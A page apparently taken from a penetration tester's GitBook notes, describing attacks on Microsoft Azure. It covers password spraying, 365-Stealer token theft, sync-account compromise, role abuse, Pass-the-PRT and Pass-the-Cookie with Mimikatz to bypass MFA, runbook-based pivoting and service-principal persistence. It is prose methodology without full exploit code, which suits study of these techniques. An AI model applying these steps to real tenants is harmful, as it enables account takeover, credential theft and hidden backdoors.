Tactics, Techniques, and Procedures
Personal BlogTwitterGitHubContact
  • Tactics, Techniques, and Procedures
  • ☠️Pentesting
    • Fortress
      • Automation
      • Cisco
        • Cisco Adaptive Security Appliance
        • Cisco Smart Install
      • CMS
        • Drupal
        • Wordpress
      • Exchange
      • Office365
      • Okta
      • Outlook Web Access (OWA)
      • SSH
      • Subdomain Takeover
    • Infrastructure
      • Active Directory
        • AD CS
        • Coercing Authentication
        • Credential Dumping
          • Cached Domain Credentials
          • Data Protection API (DPAPI)
          • Group Policy Preferences
          • LSA Secrets
          • LSASS Memory
          • NTDS
          • Security Account Manager (SAM)
          • Kerberos Tickets
          • Unsecured Credentials
          • WDigest
          • WiFi Profiles
        • Delegation Abuse
          • Constrained Delegation
          • Unconstrained Delegation
        • Domain Enumeration
        • Domain Dominance
          • Forge Golden Ticket
          • Forge Silver Ticket
          • Forge Trust Ticket
          • Skeleton Key
        • Group Policy Preferences
        • Kerberos
          • AS-REP Roasting
          • Kerberoasting
          • Kerberos Relaying
        • Lateral Movement
          • PowerShell
          • Windows Remote Management (WinRM)
        • Local Administrator Password Solution (LAPS)
        • NoPac
        • NTLMv1
        • Password Cracking
        • Password Policy
        • Password Spraying
        • Reconnaissance
        • Relaying
          • LDAP Relaying
          • SMB Relaying
        • Shadow Credentials
        • Zerologon
      • Database Management System (DBMS)
        • Microsoft SQL Server
      • Defense Evasion
        • Disable or Modify Tools
        • Disable Windows Event Logging
        • Impair Command History Logging
        • Timestomping
      • Low-Hanging Fruit
      • Networks
        • IPv6
        • LLMNR/NBT-NS Poisoning
        • Network Scanning
        • Network Sniffing
        • Segmentation Testing
        • Simple Network Management Protocol (SNMP)
        • Subnet Enumeration
        • Identifying Domain Information
      • Persistence
        • Create Account
        • Remote Desktop
        • Services
          • Service Privilege Escalation / Persistence
          • Systemd Service Persistence
        • Web Shell
        • DLL Hijacking
      • Pivoting
      • Privilege Escalation
        • Linux
          • Setuid and Setgid
        • Windows
          • Privilege Abuse
            • SeImpersonatePrivilege
            • SeLoadDriverPrivilege
          • Service Exploitation
    • Initial Access
      • Phishing
        • Creating Templates
          • Leveraging AI During Template Creation
        • Payloads
          • Non-malicious Callback
          • Macros
    • OSINT
      • Identifying Users
      • Network Information
      • Search Engines
    • Web Applications
      • Access Control
      • APIs
        • Swagger API
      • Authentication
        • Account Takeover
      • Clickjacking
      • Cross Origin Resource Sharing (CORS)
      • Cross Site Request Forgery (CSRF)
      • Document Object Model (DOM)
      • File Upload
      • Google Dorking
      • GraphQL
      • HTTP Request Smuggling
      • Information Disclosure
      • Insecure Direct Object Reference (IDOR)
      • Injection Vulnerabilities
        • Cross-Site Scripting (XSS)
          • Blind Cross-Site Scripting
          • Finding Cross-Site Scripting
          • Stealing Cookies
          • XSS Payloads
        • CSV Injection
        • XML External Entity Injection (XXE)
        • LDAP Injection
        • NoSQL Injection
        • Server-Side Template Injection
        • SQL Injection
      • JSON Web Tokens (JWT)
      • Local File Inclusion (LFI)
      • OAuth
      • Open Redirection
      • Password Reset Poisoning
      • Prototype Pollution
      • Race Condition
      • Rate Limit Bypass
      • Remote Code Execution (RCE)
      • Remote File Inclusion (RFI)
      • Suspicious Parameters
      • Tooling
        • Burp Suite
          • Authentication / Proxy Issues
          • Intruder Attack Types
          • Match and Replace
          • Quality of Life
        • Misc Tooling
      • WAF Bypasses
      • WebSockets
      • Web Cache Deception
      • Web Cache Poisoning
    • Wireless
      • WPA / WPA2
        • Alfa Troubleshooting
        • Enterprise
        • Personal
    • Cloud
      • Amazon Web Services (AWS)
      • Microsoft Azure
  • 🧨Red Teaming
    • C2
      • Cobalt Strike
      • Empire
      • Metasploit
        • Metasploit Datatabase
      • Mythic
      • Sliver
    • Malware Dev
    • Offensive Infrastructure
      • Cloud Fronting
      • Redirectors
      • OpSec
      • Phishing Infrastructure
      • Creating a Dropbox
    • Offensive Tactics
    • Philosophy
  • 🦋Bug Bounty
    • Bug Bounty Tips & Tricks
  • 📖Resources
    • Blog Posts and Goodies
    • Checklists
    • Offensive Security Notes
    • Tooling Repository
    • Active Directory Toolkit
Powered by GitBook
On this page
  • Toolset
  • External
  • Enumerating Blobs
  • Internal
  • MISC
  • Signing into Azure
  • Role Abuse
  • PRT (Primary Refresh Token)
  • Pass the PRT
  • Pass the Cookie
  • Post Exploitation
  • Persistence
  1. Pentesting
  2. Cloud

Microsoft Azure

Toolset

  • AADInternals

  • Microsoft Azure PowerShell (MSOnline, AzureAD and AzureCLI)

  • Interacting Manually through the Azure Portal

  • PowerZure

  • ROADTools

  • 365-Stealer (Initial Access)

  • TREVORspray (Replaceable with any other Password Spraying Solution such as MSOLSpray)

External

  • Azure Web Service applications run with Managed Identity Permissions - capturing an access token may allow a user to enumerate the Azure tenant and potentially on-prem AD environment.

  • Identifying a vulnerability such as SQLi, RCE, or SSRF in a web application to obtain a shell and enumerate from there.

    • If the attacker drops into a container, they can check if the pod has access to something like AWS instance metadata (Searching for IAM credentials)

      • AssumeRole is an easy privilege escalation opportunity, allowing the user to impersonate others, potentially obtaining access to other resources.

      • An attacker can enumerate the Azure tenant by querying a users login information on a Microsoft endpoint. If it is managed, then we know AzureAD is in use.

  • Perform attacks such as password spraying, phishing for easy initial access.

  • We can utilize 365-Stealer to exploit an OpenRedirect vulnerability, send it to AzureAD users and potentially obtain the access token information of a user.

    • This is effective as it uses microsoftonline.com and sends the access token information by a POST method to the attacker.

  • Utilize MFASweep to see if there's any MFA or Conditional Access policies blocking us from accessing the domain with a specific user.

Enumerating Blobs

  • Enumerating Blobs for a specific tenant can be pretty hard, there is a tool called Blobhunter which can be used to look for open containers within an environment.

  • We can use MicroBurst to see if we can enumerate public Azure blobs that contain a specific key word such as the client name.

Internal

MISC

  • Azure by default will have .NET 4.0 installed.

  • Service Prinicpals in Azure are accounts linked to applications.

Authentication Types

  • Most likely Password Hash Synchronization (PHS) is in use, where passwords from on-prem are sent to the cloud (similar to a domain controller).

    • We can exploit this by compromising the Synchronization account as it essentially can replicate EVERY domain users password.

      • This can be found with an LDAP query, looking for the default description.

    • Once we retrieve the password, we can use a tool called ADConnectDump to retrieve credentials via the network.

  • Pass through Authentication allows for a user to have a single password for Azure and on-premise.

    • For example, a user logs into Outlook on the web which Azure then uses PKI to encrypt and send back to an on-prem agent and validates it against the DC.

    • This potentially allows for DLL Injection into the PTA agent and to intercept authentication requests.

  • If Single-Sign-On authentication is enabled, an attacker can craft a Silver Ticket (IF MFA IS DISABLED) and inject it into the current session to impersonate the targeted user on an Azure AD application.

  • Azure CMDLets (AADInternals)[https://github.com/Gerenios/AADInternals]

  • Azure PowerShell (https://learn.microsoft.com/en-us/powershell/module/az.resources/?view=azps-9.1.0)

    • Several interesting commands such as adding API permissions, groups, users, enumerate resources, policies, etc.

  • An attacker can query if a machine has a PRT or if the machine is AzureAD joined with the Dsregcmd.exe /status command.

  • PowerShell keeps the users session information in C:\Users\Parzival\Azure and is available in cleartext. If a user has not terminated their session, an attacker can steal this token.

Signing into Azure

  • After importing PowerZure, we can login to Azure either via an Interactive login which will spawn a new login windows or a Cached Token stored in the Users .Azure folder.

  • If MFA is not enabled, you can pass credentials in via the CLI.

Role Abuse

  • *READER - The reader role only has read-only access but cann gratn them access such as reading runbooks to see if there are any hard-coded credentials, or any other potentially interesting information.

  • CONTRIBUTOR - Allows you to manually edit resources in Azure, this means we can potentially execute arbitrary commands, an MSBuild Payload, or an arbitrary binary.

    • You can also return Key Vault contents to identify secret keys or certificates, application secrets, and automation account Run-as credentials.

    • Contributors can also download disks which can give them a significant amount of information.

  • Owner - Can do every a contributor can, as well as give permission to resources they own which may provide a backdoor opportunity.

  • Administrator - Administrators can assign roles and create backdoors - allowing for an attacker to create a runbook and execute it, ultimately creating a new user, assigning them to the Owner rople, and generating a webhook for an attacker to execute.

PRT (Primary Refresh Token)

  • Used to provie an SSO experience so that you can access Teams, Exchange Online, and AzureAD without re-authenticating.

  • When a user signs into a website with a browsow that supports SSO to Azure, the Cloud Authentication Provider will create a PRT cookie for a user.

  • As an attacker, if we can compromise a user's PRT and session key, we can arbitrarily create PRT cookies to gain access to web resources as that user from any device.

Pass the PRT

  1. Extract the PRT from LSASS using Mimikatz Sekurlsa::cloudap

  2. Using the decrypted Session Key, we will obtain the derived key for the PRT and the context. This is needed to create our PRT cookie using Mimikatz. The derived key is what is used to sign the JWT for the cookie.

Pass the Cookie

  1. Extract browser cookies from a user by utilizing Mimikatz

    1. We care about Azure authentication cookies here such as the ESTSAUTH, ESTSAUTHPERSISTENT, and ESTSAUTHLIGHT

  2. Now that we have the cookies, we can pass them into another session to take over the identified account, ultimately bypassing MFA.

  3. We do not need privileged access to a workstation to perform this attack as all users have access to read and decrypt their own browser cookies, regardless of privileged access to the workstation.

Post Exploitation

  • If you have compromised a Global Administrator or InTune Administrator you can run arbitrary scripts (Runbook Scripts in PowerShell or Python) against AzureAD joined machines.

    • This can allow an attacker to pivot from the cloud to on-prem or deploy persistence/ransomware across several machines.

Persistence

  • If a tenant has been compromised, an attacker can modify conditional access policies, allowing for specific users to connect without any restrictions. This would be logged by Azure though.

  • Assign credentials to Service Principals. In Azure, any user has the rage to create and register applications.

    • Assigning high privileges to applications requires the consent of an Administrator.

  • Once a Global or Application administrator has been compromised, you can add privileges to any application via the Azure Portal. These credentials can then be associated to the Service Principal - it should be noted that Azure Principals do not require MFA.

PreviousAmazon Web Services (AWS)NextC2

Last updated 1 year ago

Extract the Session Key. If you remember this is issued and then re-encrypted by the local device, so we need to decrypt this using a DPAPI masterkey. We’ve learned about that and will use the same approach.

☠️
in the Pass-the-Cookie attack